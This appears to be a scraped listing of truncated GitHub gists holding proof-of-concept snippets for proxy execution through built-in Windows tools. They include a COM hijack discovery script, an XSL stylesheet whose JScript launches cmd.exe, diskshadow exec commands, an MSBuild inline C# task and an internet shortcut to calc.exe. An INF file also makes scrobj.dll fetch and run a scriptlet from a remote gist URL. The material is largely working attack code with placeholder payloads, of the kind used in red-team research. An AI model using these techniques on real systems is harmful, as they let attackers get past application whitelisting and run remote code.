This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- Abandoned COM Discovery Script. | |
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions) | |
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while ($true) { | |
$(Get-Date).ToUniversalTime() | |
$Runspace = [runspacefactory]::CreateRunspace() | |
$PowerShell = [powershell]::Create() | |
$PowerShell.runspace = $Runspace | |
$Runspace.Open() | |
[void]$PowerShell.AddScript({ | |
$tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
$tcpStream = $tcpConnection.GetStream() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
file | |
StaticMetafile | |
StaticDib | |
clsid | |
objref | |
ADODB.Command.6.0 | |
ADODB.Parameter.6.0 | |
ADODB.Connection.6.0 | |
ADODB.Recordset.6.0 | |
ADODB.Error.6.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Execute | |
======= | |
*Interactive Mode | |
cmd.exe | |
c:\windows\system32\diskshadow.exe | |
> exec calc.exe | |
> exec "cmd.exe" /c calc.exe | |
> exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[version] | |
signature="$CHICAGO$" | |
AdvancedINF=2.0 | |
[DefaultInstall.Windows7] | |
UnRegisterOCXs=FunRun | |
[FunRun] | |
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; DRIVER.INF | |
; Copyright (c) Microsoft Corporation. All rights reserved. | |
[Version] | |
Signature = "$CHICAGO$" | |
Class=61883 | |
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} | |
Provider=%Msft% | |
DriverVer=06/21/2006,6.1.7600.16385 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[InternetShortcut] | |
URL=file:///c:\windows\system32\calc.exe |